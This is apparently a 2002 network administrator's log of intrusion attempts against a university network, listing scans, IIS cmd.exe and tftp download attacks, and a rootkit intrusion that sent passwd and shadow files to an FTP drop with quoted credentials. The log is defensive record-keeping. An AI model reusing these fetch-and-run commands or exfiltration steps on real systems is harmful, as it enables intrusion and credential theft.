Short summary of some of the attacks against us for May. 2002 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes 2002/05/01-04:00:38.55 213.20.224.156 (port-213-20-224-156.reverse.qdsl-home.de) scannet for port 80 2002/05/01-14:35:18.51 68.81.146.233 (pcp01323128pcs.neave01.pa.comcast.net) scannet for port 21,anonftp attack 2002/05/01-16:59:43.35 62.227.227.54 (p3EE3E336.dip.t-dialin.net) scannet for ports 21,80,1080 2002/05/01-17:54:35.53 172.171.21.176 (ACAB15B0.ipt.aol.com) scannet for port 21,anonftp attack 2002/05/01-19:13:56.18 217.225.139.226 (pD9E18BE2.dip.t-dialin.net) scannet fo rport 80 2002/05/01-22:18:01.22 172.134.111.198 (AC866FC6.ipt.aol.com) use bad cgi to spam aol until 23:13:26.80 2002/05/02-02:58:50.18 24.150.16.120 (d150-16-120.home.cgocable.net) scannet for port 21 2002/05/02-03:29:50.51 213.29.206.30 (Isfahan University of Technology,IR) scannet for port 21 2002/05/02-04:16:16.53 65.67.115.141 (adsl-65-67-115-141.dsl.rcsntx.swbell.net) use bad cgi to spam aol all day long 2002/05/02-08:19:18.54 65.198.68.56 (netmapper.research.lumeta.com) spend all day mapping our network w/ping 2002/05/02-11:36:59.75 211.14.146.2 (PSINet Japan Inc.,JP) scannet for port 21 2002/05/02-14:04:04.11 200.247.112.214 (nfns02-0214.fns.embratel.net.br) scannet for port 21 2002/05/02-19:31:59.78 61.133.243.2 (CHINANET Qinghai province network) scannet for port 21 2002/05/02-20:48:08.08 212.160.105.66 (ns.indoor-group.com.pl) scannet for port 21 2002/05/03-14:20:51.28 81.65.55.70 (m70.net81-65-55.noos.fr) scannet ofr port 1433 2002/05/03-17:37:34.85 193.231.28.159 () scannet for port 21 2002/05/03-18:41:44.16 65.103.74.82 (U S WEST Communications Svcs, Inc. ,MN,US) scannet for port 21 2002/05/03-23:09:50.73 212.244.10.37 (fastlane-3.zyb.citynet.pl) probe port 111/other on several ips, buff overflow 2002/05/04-00:38:06.68 216.3.1.7 (dyn006-ts8a.athens.frognet.net) portscan 132.235.1.12 (jmarion@prime) 2002/05/04-12:05:19.50 81.65.55.70 (m70.net81-65-55.noos.fr) scannet on port 1433 2002/05/04-15:04:07.83 213.93.117.23 (e117023.upc-e.chello.nl) scannet for port 21 2002/05/04-17:36:18.09 212.244.10.37 (fastlane-3.zyb.citynet.pl) probe port 111/other on several ips, buff overflow-statdx 2002/05/04-18:02:26.49 141.211.239.226 (ccmail.bus.umich.edu) scannet for port 1433 2002/05/04-18:05:07.08 141.211.239.226 (ccmail.bus.umich.edu) scannet for port 1433 2002/05/04-22:11:17.63 80.132.188.211 (p5084BCD3.dip.t-dialin.net) scannet for port 21 2002/05/04-23:16:32.53 134.60.20.37 (peanut7.e-technik.uni-ulm.de) scannet for port 21 2002/05/04-23:16:33.50 134.60.20.37 (peanut7.e-technik.uni-ulm.de) scannet on port 21 2002/05/05-03:58:40.24 210.50.24.84 (084.d.002.pth.iprimus.net.au) 1. attask IIS server w/buff overflow w/cmds to ftp to 66.28.32.12 port 9876 2002/05/05-03:58:40.24 210.50.24.84 (084.d.002.pth.iprimus.net.au) 2. login/passwd test/test and get ServUDaemon.* 2002/05/05-04:04:42.06 193.40.129.31 (ws-3.oppeosakond.artun.ee) scan net port 80, IIS buff overflow attack all ips 2002/05/05-05:35:09.69 66.188.102.142 (66-188-102-142.mad.wi.charter.com) scannet for port 21 2002/05/05-07:02:42.85 212.185.238.10 (pD4B9EE0A.dip.t-dialin.net) scannet fo rport 1433 2002/05/05-10:30:25.78 64.85.15.91 (SecureWebs, Inc.,Colville, WA,US) scannet for port 21 (Yea, secure alright) 2002/05/05-13:25:45.41 195.225.8.113 (pc113.mediafront.no) scannet port 80, IIS buff overflow attack all ips 2002/05/05-14:18:58.13 62.123.0.90 (ppp-62-123-0-90.dial.ipervia.it) scannet for port 21,23,111 2002/05/05-16:19:08.86 80.14.122.172 (ANice-203-1-3-172.abo.wanadoo.fr) scannet for port 21, 137 2002/05/06-06:16:25.34 202.188.93.224 (TMnet Telekom Malaysia,MY) try to login to 132.235.17.17 as root/root 2002/05/06-06:57:00.40 80.200.160.49 (80-200-160-49.adsl.powered-by.skynet.be) scannet for port 21 2002/05/06-09:47:47.57 203.106.165.160 (TMnet Telekom Malaysia,MY) scannet for ports 79,161,1524 2002/05/06-14:30:24.64 172.186.182.30 (ACBAB61E.ipt.aol.com) scannet for port 21 2002/05/06-15:24:54.42 128.134.55.62 (korea crap) scannet for port 445 2002/05/06-15:29:45.75 161.184.166.208 (edtn009860.hs.telusplanet.net) scannet for port 445 2002/05/07-00:26:03.80 202.151.224.45 (Maxis Communications Berhad ISP) scannet for ports 79,161,1524 2002/05/07-07:03:35.70 209.12.240.200 (Zebra Net, Inc.,AL,US) scan several ips for port 111 2002/05/07-10:37:06.37 217.128.97.164 (ALyon-102-1-4-164.abo.wanadoo.fr) scannet for port 21 2002/05/07-11:25:50.04 80.132.81.255 (p508451FF.dip.t-dialin.net) login to hacked machine vi ftp on servuftp server. 2002/05/07-21:52:23.01 61.147.44.133 (CHINANET Jiangsu province network,CN) scannet for port 80, try cmd.exe execute on all ips 2002/05/07-21:57:47.42 62.212.119.229 (aboukir-102-1-30-229.adsl.nerim.net) scanne tfor port 21 2002/05/07-22:37:13.88 61.78.51.202 (CENTRAL DATA COMMUNICATION OFFICE,seoul,kr) SCANNET FOR PORT 60001 2002/05/07-23:56:34.42 217.136.135.18 (adsl-67346.turboline.skynet.be) scannet for port 21, anon ftp attack 2002/05/08-04:36:20.46 66.130.202.85 (modemcable085.202-130-66.que.mc.videotron.ca) scannet for port 21 2002/05/08-04:36:45.23 195.129.24.17 (lobal Telelink Gmbh, Zürich,EU) scannet for por t80 2002/05/08-14:11:53.08 193.108.80.149 (ZEBRAHOSTSNET,GB) scannet for port 6112, buff overflow attacks dtspc 2002/05/08-15:45:23.82 62.62.191.128 (9 Telecom,FR) scannet for port 21 2002/05/08-16:53:30.81 62.62.212.15 (9 Telecom,FR) scannet for port 21, anon ftp attacks 2002/05/08-21:01:00.93 66.130.202.85 (modemcable085.202-130-66.que.mc.videotron.ca) scannet for port 21 2002/05/08-22:27:06.98 61.147.43.140 (CHINANET Jiangsu province network) attack iis server w/ tftp%20-i%20132.235.32.111%20GET%20cool.dll 2002/05/08-22:28:13.39 66.110.145.80 (adsl-66.110.145-80.globetrotter.net) scannet for port 80 2002/05/09-01:24:39.20 66.110.154.10 (adsl-66-110-154-10.globetrotter.net) attack iis server w/ tftp+-i+66.110.154.10+get+iss.exe+ 2002/05/09-01:44:46.21 208.177.150.80 (w080.z208177150.chi-il.dsl.cnc.net) scannet fo rport 515 2002/05/09-02:53:47.84 61.147.44.142 (CHINANET Jiangsu province network) heavy scans port 80 w/ cmd.exe access attacks 2002/05/09-03:55:44.05 213.9.177.58 (Auto Saenz SA,ES) scannet for port 80 2002/05/09-11:18:59.06 132.235.206.177 (dhcp-206-177.cns.ohiou.edu) scannet for port 139 2002/05/09-12:23:41.40 211.60.219.140 (DACOM,SEOUL,KR) ICMP Broadscan Smurf Scanner 2002/05/09-13:37:52.64 80.116.237.153 (Telecom Italia, IT) scann for ports 21, 6667,23 2002/05/09-14:09:48.36 195.194.144.18 (pursglove.ac.uk) scannet for port 80 2002/05/09-14:39:10.17 80.129.179.91 (p5081B35B.dip.t-dialin.net) scannet for ports 21, 80, 1080 2002/05/09-17:26:17.27 132.235.207.152 (dhcp-207-152.cns.ohiou.edu) scannet for port 138, 80 2002/05/09-20:42:03.35 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) scannet for port 139,80,445 multple passes 2002/05/09-21:42:16.30 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) scannet for port 161 2002/05/09-22:32:13.30 217.136.132.54 (217-136-132-54.skynet.be) scannet for port 21 2002/05/10-03:28:04.58 61.147.47.196 (CHINANET Jiangsu province network,CN) some moron still trying to use 132.235.1.70 for dns 2002/05/10-06:31:40.79 202.100.68.22 (Feitian Internet Company,GANSU,CN) scannet for port 111, sadmind attack 2002/05/10-07:30:43.78 217.136.133.239 (adsl-67055.turboline.skynet.be) scannet for port 21,anon ftp attacks 2002/05/10-07:30:48.55 217.136.133.239 (adsl-67055.turboline.skynet.be) scannet for port 21, anon ftp attacks 2002/05/10-07:52:24.74 80.143.206.46 (p508FCE2E.dip.t-dialin.net) scannet for port 21,anon ftp attacks 2002/05/10-08:45:10.41 63.127.7.122 (Alfanumeric, S.A.,MANAGUE,US) scannet for port 21 2002/05/10-09:19:26.10 128.39.154.131 (Norwegian Telecommunications Administration) scannet for port 80 2002/05/10-10:08:01.97 66.148.227.106 (66.148.227.106.nw.nuvox.net) scannet for port 21 2002/05/10-10:17:10.87 67.104.186.130 (XO Communications,CA,US) scannet for port 21 2002/05/10-10:21:31.95 218.51.176.101 (Hanaro Telecom Co.,KOREA) scannet for port 21 2002/05/10-11:09:02.27 210.6.68.147 (210006068147.ctinets.com) scannet for port 21 2002/05/10-17:48:57.39 65.92.12.234 (HSE-Hamilton-ppp3514061.sympatico.ca) scannet for port 139 - SMB C drive access 2002/05/10-19:04:33.19 217.39.86.90 (host217-39-86-90.in-addr.btopenworld.com) scannet for port 139 - SMB C drive access 2002/05/10-20:51:40.13 68.41.50.45 (bgp946235bgs.canton01.mi.comcast.net) scan 132.235.1.11 for pot 8080 2002/05/10-22:14:04.50 212.187.126.80 (c126080.upc-c.chello.nl) scannet for ports 80, 139, 3389 2002/05/11-04:15:42.26 61.138.232.12 (CHINANET xinjiang province network,CN) attack IIS server w/buff overflow attacks-sadmind 2002/05/11-04:46:54.99 66.13.183.52 (bdsl.66.13.183.52.gte.net) scannet for port 21 2002/05/11-05:10:19.65 61.147.47.196 (CHINANET Jiangsu province network,CN) try to use 132.235.1.70 as dns 2002/05/11-07:07:27.54 61.147.48.1 (CHINANET Jiangsu province network,CN) try to use 132.235.1.70 as dns 2002/05/11-07:43:18.97 65.69.127.203 (adsl-65-69-127-203.dsl.tulsok.swbell.net) scannet for port 21 2002/05/11-07:50:01.25 203.249.33.9 (Kyungki Junior College,KR) attack 2 machines w snmpXdmi buff overflow attack 2002/05/11-21:58:35.25 172.184.84.167 (ACB854A7.ipt.aol.com) scannet for port 80 2002/05/11-22:20:17.63 211.207.15.59 (Hanaro Telecom Co.,KOREA) scannet for port 21, anon ftp attacks 2002/05/11-23:01:10.62 216.72.215.31 (TVCABLE,BOGOTA,CO) scannet for port 21,515 2002.05/13-15:31:24.02 200.50.121.164 (50-121-164.adsl.cust.tie.cl) scannet for port 21 2002/05/12-15:41:39.16 62.147.159.91 (nas-cbv-8-62-147-159-91.dial.proxad.net) portscan 1 ip 2002/05/12-15:50:43.48 80.14.211.141 (ALimoges-101-1-5-141.abo.wanadoo.fr) scannet for port 21 2002/05/12-22:26:25.38 61.147.44.140 (CHINANET Jiangsu province network,CN) 1. attack iis server with command: 2002/05/12-22:26:25.38 61.147.44.140 (CHINANET Jiangsu province network,CN) 2. tftp%20-i%20132.235.32.111%20GET%20cool.dll 2002/05/13-05:04:33.70 134.68.75.176 (dhcp-ip-134-68-75-176.ip.iupui.edu) scannet for port 111 2002/05/13-05:56:23.61 134.68.75.176 (dhcp-ip-134-68-75-176.ip.iupui.edu) scannet for port 111 2002/05/13-11:47:40.23 193.253.230.33 (ALyon-102-1-2-33.abo.wanadoo.fr) scannet fo rport 21 , anon ftp attacks 2002/05/13-17:27:02.04 64.246.26.137 (Everyones Internet, Inc. ,TX,US) scannet for port 21 2002/05/14-03:44:08.70 211.177.141.4 (HANARO Telecom,SEOUL, KR) scannet for port 21, anon ftp attacks 2002/05/14-06:17:17.33 172.183.240.24 (ACB7F018.ipt.aol.com) ping scan of net 2002/05/14-09:02:56.13 132.235.18.55 (stocker hall, OHIOU) scannet for port 80,110,139 2002/05/14-10:41:43.05 80.116.199.168 (Telecom Italia Net,IT) scannet for port 21,22,23 2002/05/14-11:19:49.06 80.116.199.168 (Telecom Italia Net,IT) scannet for port 21,22,23 2002/05/14-11:50:19.03 148.235.37.135 (Programatica y Sistemas,MX) scannet for port 515 2002/05/14-12:24:45.70 212.239.202.130 (u212-239-202-130.adsl.pi.be) scannet for port 21,anon ftp attacks 2002/05/14-13:34:29.05 132.241.6.237 (California State University, Chico,CA,US) sannet for port 1214 2002/05/14-14:29:00.40 162.130.1.254 (host254.marriott.com) ftp t0 132.235.17.17, login as root (no pwd, abc@hotmail.com), guest/guest 2002/05/14-14:53:03.11 62.211.252.159 (elecom Italia,IT) scannet for port 21,22,23 2002/05/14-15:51:13.25 132.235.207.152 (dhcp-207-152.cns.ohiou.edu) scannet for port 139.80 2002/05/14-16:58:51.08 65.31.37.148 (dhcp065-031-037-148.woh.rr.com) scannet for port 21 2002/05/14-18:54:00.77 212.211.90.13 (fra-tgn-oyk-vty13.as.wcom.net) scannet for port 23 2002/05/14-21:45:31.82 80.11.175.39 (ALille-205-1-1-39.abo.wanadoo.fr) scannet for port 21 2002/05/14-23:06:25.41 62.30.230.227 (pc-62-30-230-227-sc.blueyonder.co.uk) scannet for por 80 2002/05/14-23:30:36.84 168.115.37.203 (dhackerz.donga.ac.kr) scannet for port 21 2002/05/15-00:39:06.32 208.61.90.149 (adsl-61-90-149.mia.bellsouth.net) scannet for port 1214 2002/05/15-04:30:54.99 62.62.188.93 (9TELECOM,FR) scannet for port 21 2002/05/15-06:02:37.63 61.177.251.125 (CHINANET Jiangsu province network,CN) scannet for port 80 2002/05/15-09:30:45.13 132.235.18.55 (dhcp-018-055.cns.ohiou.edu) scan net ports 80,139 2002/05/15-10:19:50.23 61.147.48.73 (CHINANET Jiangsu province network,CN) still try to use 132.235.1.70 as dns 2002/05/15-10:36:32.08 168.115.37.203 (dhackerz.donga.ac.kr) scan net port 21 2002/05/15-11:46:54.10 132.235.207.152 (dhcp-207-152.cns.ohiou.edu) scan net port s 239 2002/05/15-11:59:55.30 206.23.240.99 (Tennessee Board of Regents,TN,US) scannet for port 80,8000 2002/05/15-12:06:41.20 80.11.175.39 (ALille-205-1-1-39.abo.wanadoo.fr) scan net port 21 2002/05/15-14:29:03.74 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) DNS zone transfer 2002/05/15-14:34:44.00 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) scan net ports 21,23, 6112 2002/05/15-14:36:25.62 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) 2.Try to open xterm to 200.56.216.90:0.0 2002/05/15-14:36:25.62 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) 3.ftp to ebp.flnet.org port 621 (ebp/..lxxekslxxeks), 2002/05/15-14:36:25.62 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) 4. get rootkit, copy passwd & shadow files to ebp. 2002/05/15-14:36:25.62 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) 5. set passwd on adm. set up trojan login program.. 2002/05/15-14:36:25.62 148.223.69.181 (customer-148-223-69-181.uninet.net.mx)) 1. hack into topdog via second inetd. 2002/05/15-16:07:32.49 194.149.72.188 (envirtual.com ) scannet for port 21 2002/05/15-18:51:01.54 200.74.23.1 (pc320-200-74-23-1.apoquindo2.pc.metropolis-inter.com) sxcannet for port 1214 2002/05/15-21:11:57.94 209.207.210.175 (sanproject.dn.net) scannet for port 21 2002/05/16-02:53:02.97 65.119.129.142 (INFO AVENUE INTERNET SERVICES,IN,US) scannet for port 1214 2002/05/16-10:47:35.03 132.235.18.55 (dhcp-018-055.cns.ohiou.edu) scannet for port 80,110,139 2002/05/16-14:51:05.09 66.123.162.118 (MichaelSchiffman,ca) DNS named version attempt 2002/05/16-17:26:49.51 212.143.218.174 (ADSLP218-NV64A-p174.adsl.netvision.net.il) scannet for port 80 2002/05/16-17:27:34.28 212.143.218.174 (ADSLP218-NV64A-p174.adsl.netvision.net.il) 1.attack II server with command: 2002/05/16-17:27:34.28 212.143.218.174 (ADSLP218-NV64A-p174.adsl.netvision.net.il) 2. tftp.exe+"-i"+212.143.218.174+get+WINMGNT.EXE+c:\Inetpub\WINMGNT.EXE 2002/05/16-17:59:08.31 213.105.221.116 (pc3-ware3-0-cust116.ltn.cable.ntl.com) scannet for port 1214 2002/05/16-18:21:21.18 212.143.218.174 (ADSLP218-NV64A-p174.adsl.netvision.net.il) attack iis server w same tftp as before 2002/05/16-20:42:26.01 24.208.182.203 (dhcp024-208-182-203.columbus.rr.com) portscan 132.235.17.1 2002/05/16-21:28:16.89 193.224.148.251 (jatek.szgti.kando.hu) scannet for port 22 2002/05/17-00:38:35.12 132.235.207.152 (dhcp-207-152.cns.ohiou.edu) scannet for port 139 2002/05/17-07:22:13.38 12.231.196.54 (12-231-196-54.client.attbi.com) scannet for ports 80,21,23,25 2002/05/17-15:34:05.61 195.242.13.183 (spb-1-183.dialup.rcom.ru) scannet for port 1080 2002/05/17-16:22:17.17 193.251.47.240 (ALagny-101-1-1-240.abo.wanadoo.fr) ping scan of net, anon ftp attacs 2002/05/17-16:22:20.21 193.251.47.240 (ALagny-101-1-1-240.abo.wanadoo.fr) scannet for port 21 2002/05/17-16:40:08.50 128.175.112.246 (University of Delaware,DE.US) ICMP Broadscan Smurf Scanner 2002/05/17-17:50:44.37 138.245.80.67 (rheuma.ibe.med.uni-muenchen.de) scannet for port 80 2002/05/18-00:13:38.04 208.251.168.130 (Ndosa Technologies,NJ,US) scannet for port 80 2002/05/18-01:33:22.24 67.83.91.243 (ool-43535bf3.dyn.optonline.net) scannet for port 1214 2002/05/18-04:04:37.07 212.10.223.198 (pc46198.stofanet.dk) scannet for port 1433 2002/05/18-12:45:48.32 217.136.117.22 (adsl-62742.turboline.skynet.be) scannet for port 21 2002/05/19-00:43:59.51 172.186.30.196 (ACBA1EC4.ipt.aol.com) scannet for port 80 2002/05/19-04:32:09.10 68.5.246.244 (ip68-5-246-244.oc.oc.cox.net) scannet for port 21 2002/05/19-05:01:04.24 217.229.139.45 (pD9E58B2D.dip.t-dialin.net) scannet for port 21 2002/05/19-11:14:35.88 148.223.145.100 (mcortes.micro-tec.com.mx) scannet for port 6112 2002/05/19-12:48:30.97 61.208.208.242 (Link Bldg. Hoshukanri Maintenance,JP) scannet for port 21 2002/05/19-13:33:09.20 24.158.3.51 (24-158-3-51.mazo.wi.charter.com) scannet for port 1214 2002/05/19-15:50:34.24 130.209.132.172 (penguin.molgen.gla.ac.uk) scannet for port 21 05/20-09:16:09.57 24.158.242.174 (ip-242-174.charterpa.com) scannet for ports 3128,8080,80 05/20-20:28:09.71 211.146.127.35 (China Cablecasting Information and Network Co.,Ltd.,BEINING,CN) scannet for port 22 05/21-00:27:44.10 24.127.107.234 (c-24-127-107-234.we.client2.attbi.com) scannet for port 1214 2002/05/19-16:43:53.08 24.158.242.174 (ip-242-174.charterpa.com) scan several servers for ports 80, 3128, 8080 2002/05/19-18:28:21.56 211.101.129.229 (Twenty One century software CO., LTD.,BEIJING< CN) scannet for port 22 2002/05/19-23:09:03.48 212.198.0.97 (celsius.noos.net) scannet for prt 80 2002/05/19-23:31:24.83 24.73.100.239 (239.100.73.24.cfl.rr.com) scannet ofr port 1214 2002/05/20-00:05:41.80 65.24.133.141 (dhcp065-024-133-141.columbus.rr.com) portscan ace 2002/05/20-00:44:32.42 61.63.194.129 (Internet Solution Labs.,Taipei Taiwan ) scannet for port 6112 2002/05/20-00:45:38.08 194.3.89.48 (REGIE COMMUNALE DU CABLE ET DE L ELECTRI,FR) scannet for port 21 2002/05/20-01:42:08.05 63.231.99.48 (clspdialnas19poolc48.clsp.uswest.net) probe port 6346 on network hp printer 2002/05/20-01:42:35.66 172.167.188.20 (ACA7BC14.ipt.aol.com) probe port 6346 on network hp printer 2002/05/20-01:45:52.36 172.143.205.21 (AC8FCD15.ipt.aol.com) probe port 6346 on network hp printer 2002/05/20-10:20:00.20 212.198.0.97 (celsius.noos.net) attack iis server w/ 81.65.18.35+GET+admin.exe+c:/inetpub/adminscripts/admin.exe 2002/05/20-10:27:10.30 213.36.142.65 (Praxitel/Liberty Surf,FR) attack iis server w/ tftp+-i+213.36.142.65+get+spac.txt+d:\msimev71\spac.txt 2002/05/20-12:34:50.82 148.235.37.135 (customer-148-235-37-135.uninet.net.mx) scannet for port 515 2002/05/20-16:35:37.31 209.162.231.73 (73.231.aragorn.worldwithoutwire.com) scannet for port 1433 2002/05/20-20:12:48.77 67.8.30.105 (105.30.8.67.cfl.rr.com) scannet for port 1214 2002/05/20-22:24:11.72 12.249.91.82 (12-249-91-82.client.attbi.com) scannet for port 1214 2002/05/20-23:17:11.13 211.114.0.252 (CIVIL ENGINEERING RESERCH INFORMATION CENTER,KYONGGI,KR) scannet for port 515,attack lpd 2002/05/21-00:43:10.05 80.14.226.169 (APuteaux-106-1-4-169.abo.wanadoo.fr) scannet for port 21 2002/05/21-01:45:18.90 63.236.0.200 (Qwest Cybercenters,NJ,US) scannet for port 22 2002/05/21-04:36:05.00 12.84.236.26 (26.indianapolis-07rh15rt.in.dial-access.att.net) ping scan of net 2002/05/21-04:37:28.68 64.95.172.243 (Onvia.com,WA,US) scannet for port 1433 2002/05/21-06:23:32.41 216.254.90.46 (dsl254-090-046.nyc1.dsl.speakeasy.net) scannet for port 1433 2002/05/21-06:23:32.74 216.254.90.46 (dsl254-090-046.nyc1.dsl.speakeasy.net) scannet for port 1433 2002/05/21-13:20:35.02 212.185.252.67 (cw03.F1.srv.t-online.de) attack IIS server w/ +mkdir+d:\temp\ext443 2002/05/21-15:17:28.04 195.19.19.39 (Russian Science & Productional Alliance,RU) scannet for port 22 2002/05/21-19:24:46.88 200.56.150.136 (customer-VER-150-136.megared.net.mx) attack serve with telnet buff overflow attack 2002/05/21-19:24:54.16 64.67.236.31 (cyber3dnet.com) probe port 111 on serveral machines 2002/05/21-19:48:08.73 210.117.126.228 (s210-117-126-228.thrunet.ne.kr) scannet for portr 1433 2002/05/21-21:43:36.21 208.138.159.171 (lifebody.com) scannet for port 1433 2002/05/22-00:37:49.12 144.118.219.145 (n2-219-145.resnet.drexel.edu) scannet for port 1214 2002/05/22-01:04:26.68 148.235.232.176 (daol-148-235-232-176.atdn.aol.com) scannet for port 27374 2002/05/22-09:02:38.59 208.177.157.114 (w114.z208177157.sjc-ca.dsl.cnc.net) scannet for port 22 2002/05/22-11:51:29.34 208.61.89.73 (adsl-61-89-73.mia.bellsouth.net) scannet with ICMP superscan echo 2002/05/22-12:27:46.66 128.100.9.37 (genova.control.utoronto.ca) pond on 132.235.1.89 : 8000 2002/05/22-14:50:08.31 132.235.207.152 (dhcp-206-152.cns.ohiou.edu ) scannet on port 139 2002/05/22-16:10:14.77 208.61.89.73 (adsl-61-89-73.mia.bellsouth.net) 1. scannet for IIs, attck IIS w/command: 2002/05/22-16:10:14.77 208.61.89.73 (adsl-61-89-73.mia.bellsouth.net) 2. echo+meep-meepwinnt/system32/cmd.exe?/c+echo+meep-meep 2002/05/22-16:55:26.09 68.32.209.96 (pcp01950396pcs.sabrna01.az.comcast.net) scannet for port 1214 2002/05/22-18:37:16.09 132.235.206.198 (dhcp-206-198.cns.ohiou.edu ) scannet on port 139 2002/05/22-21:39:42.33 132.235.206.177 (dhcp-206-177.cns.ohiou.edu ) scannet on port 139 2002/05/23-00:24:35.06 132.235.206.153 (dhcp-206-153.cns.ohiou.edu) scannet on port 139 2002/05/23-01:33:31.89 212.154.148.25 (Kazakhtelecom Data Network Administration,KZ) scannet fo rport 1433, SQL ATTACS. 2002/05/23-02:43:50.14 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) scannet with netbios-name-query 2002/05/23-08:27:19.33 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) 1. scannet for port 137, 139,53, 21, 1433, portscan servers 2002/05/23-08:27:19.33 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) 2. ping scan net, netbios-name-query scan of net, 2002/05/23-08:27:19.33 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) 3. icmp-subnet_mask_request scan, icmp-timestamp_request scan 2002/05/23-08:27:19.33 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) 4. cmp-information_request 2002/05/23-08:27:19.33 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) 5. .. multiplt cgi scirpt accesses 2002/05/23-08:27:19.33 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) 5. IIS server cmd.exe attacks, get /etc/passwd, 2002/05/23-12:56:52.10 198.145.178.16 (zolfaqar.portnet.net) scannet for port 1433 2002/05/23-12:58:20.76 12.231.196.54 (12-231-196-54.client.attbi.com) scan 132.235.4.204 for ports 1433 80 9100 23 515, 1080, 3128,8080 2002/05/23-13:27:23.09 213.24.99.3 (02rus.ru) scannet for port 21 2002/05/23-21:59:06.69 217.210.30.203 (h203n1fls32o271.telia.com) scannet fo rport 1433 2002/05/23-21:59:23.05 217.199.164.176 (ns.server2host.co.uk) scannet for port 1433 2002/05/23-21:59:48.41 195.117.150.139 (PROTERIANS s.c.,GDYNIA,PL) scannet for port 53 2002/05/23-21:59:48.61 195.117.150.139 (PROTERIANS s.c.,GDYNIA,PL) scannet fo rport 21 2002/05/24-03:59:59.84 61.147.47.196 (CHINANET Jiangsu province network,CN) probe 132.235.1.20 ports 445,139,137 2002/05/24-06:36:15.55 12.40.188.9 (REDWOOD TELEPHONE,US) scannet for port 80 2002/05/24-07:56:12.50 216.175.255.21 (216-175-255-21.client.dsl.net) scannet for port 1433 2002/05/24-08:02:00.09 216.175.255.21 (216-175-255-21.client.dsl.net) scannet for portr 1433 2002/05/24-08:24:52.59 80.11.24.230 (AOrleans-201-1-1-230.abo.wanadoo.fr) scannet for port 21 2002/05/24-08:35:10.77 24.166.129.137 (wks-166-129-137.kscable.com) scannet for port 21 2002/05/24-09:55:20.59 64.166.90.23 (64-166-90-23.ded.pacbell.net) scannet for port 21 2002/05/24-10:02:40.09 213.156.32.125 (socks3.fastwebnet.it) try to connect to pirinter , multiple ports 2002/05/24-11:42:53.80 148.235.37.135 (customer-148-235-37-135.uninet.net.mx) scannet for port 515 2002/05/24-12:21:32.57 211.220.41.57:1080 (korea crap) scannet for port 1080 2002/05/24-14:46:27.44 209.222.212.44 (CE1-P-UNET.unet.maine.edu) scannnet for port 80 2002/05/24-14:47:33.14 209.222.212.43 (CE2-P-UNET.unet.maine.edu) scannnet for port 80 2002/05/24-14:53:17.06 169.244.19.138(ce1-o-msln.msln.net) scannnet for port 80 2002/05/24-14:55:02.24 205.151.67.151 (67-151.tr.cgocable.ca) scannet for port 53 2002/05/24-18:50:34.57 218.46.51.196:137 (CBCba-159p196.ppp13.odn.ad.jp) scannet for netbios-name-query 2002/05/24-22:09:20.17 217.84.122.62 (pD9547A3E.dip.t-dialin.net) scannnet for port 80 2002/05/24-23:02:21.08 217.243.174.133 (OSI SOFTWARE GmbH,DE) scannet for port 1433 2002/05/24-23:23:29.61 212.145.4.89 (proxy-mad.comunitel.net) map net with slow scan of net 2002/05/24-23:23:31.48 65.94.167.38 (MTL-HSE-ppp186274.qc.sympatico.ca) start of intense entscan/muliple attacks on port 80 2002/05/25-01:29:24.24 129.255.65.68 (The University of Iowa,Iowa,US) scannnet for port 80 2002/05/25-02:34:50.19 62.226.36.179 (p3EE224B3.dip.t-dialin.net) scannet for port 80 2002/05/25-06:15:44.59 210.134.73.42 ( Y-MAX Systems,,JP) scannet for port 21 2002/05/25-10:31:57.16 66.120.108.27 (adsl-66-120-108-27.dsl.sndg02.pacbell.net) scannet for port 21 2002/05/25-10:35:17.06 213.30.188.2 (COMPLETEL SAS France, FR) multiple IIS attacks against II server 2002/05/25-11:13:51.76 63.168.211.1 (IMPAQ COMPUTER CORP,DE,US) scannet fo rport 1080 2002/05/25-11:43:41.42 151.29.82.148 (ppp-148-82.29-151.libero.it) scannet for port 21, ping 2002/05/25-11:44:42.36 151.29.82.148 (ppp-148-82.29-151.libero.it) probe 132.235.4.250 ports 21.22.23 2002/05/25-11:46:24.91 151.29.82.148 (ppp-148-82.29-151.libero.it) ICMP echo scan of net 2002/05/25-12:44:15.35 217.35.43.11 (host217-35-43-11.in-addr.btopenworld.com) scannnet for port 80 2002/05/25-15:50:35.20 141.217.35.64 (felix.physics.wayne.edu) scannnet for port 80 2002/05/25-16:45:22.01 210.175.52.100 (Echna Systems Co.,Ltd.,JP) 1. IIS attack. Create a script to : 2002/05/25-16:45:22.01 210.175.52.100 (Echna Systems Co.,Ltd.,JP) 2. ftp to strobe.dynu.com as temp/temp123. get nc.exe, 2002/05/25-16:45:22.01 210.175.52.100 (Echna Systems Co.,Ltd.,JP) 3. systray.exe, servudaemon.ini. 2002/05/25-18:23:31.64 195.101.33.125 (Reseaux d'Acces a l'INternet,FR) scannet ofr port 1433 2002/05/26-00:53:37.32 144.206.177.32:21 (sea.mbslab.kiae.ru) scannet for r port 21 2002/05/26-01:33:43.06 61.206.128.61 (Japan Medical Abstracts Society) scannet for port 21 2002/05/26-02:58:37.53 211.114.0.252 (CIVIL ENGINEERING RESERCH INFORMATION CENTER,KR) scannet for port 515 2002/05/26-03:24:14.35 24.199.80.137 (Earthlink, Inc.,GA,US) scannet for port 80 2002/05/26-06:31:17.31 212.7.14.240 (dhcp-14-240.cable.infonet.ee) cannnet for port 80 2002/05/26-07:50:45.19 212.95.76.38 (ip-76-38.evc.net) scannnet for port 80 2002/05/26-11:00:27.77 61.152.210.190 (Shanghai DigitalCom Information Industry Co., Ltd,CN) scannet for port 21 2002/05/26-11:35:46.24 66.25.58.219 (cs662558-219.houston.rr.com) scannet for port 21, anon ftp attack 2002/05/26-13:18:49.60 132.235.206.198 (dhcp-206-198.cns.ohiou.edu) scannet for port 139 2002/05/26-13:21:42.84 64.90.162.98 (abletohost.com) scannet for port 515 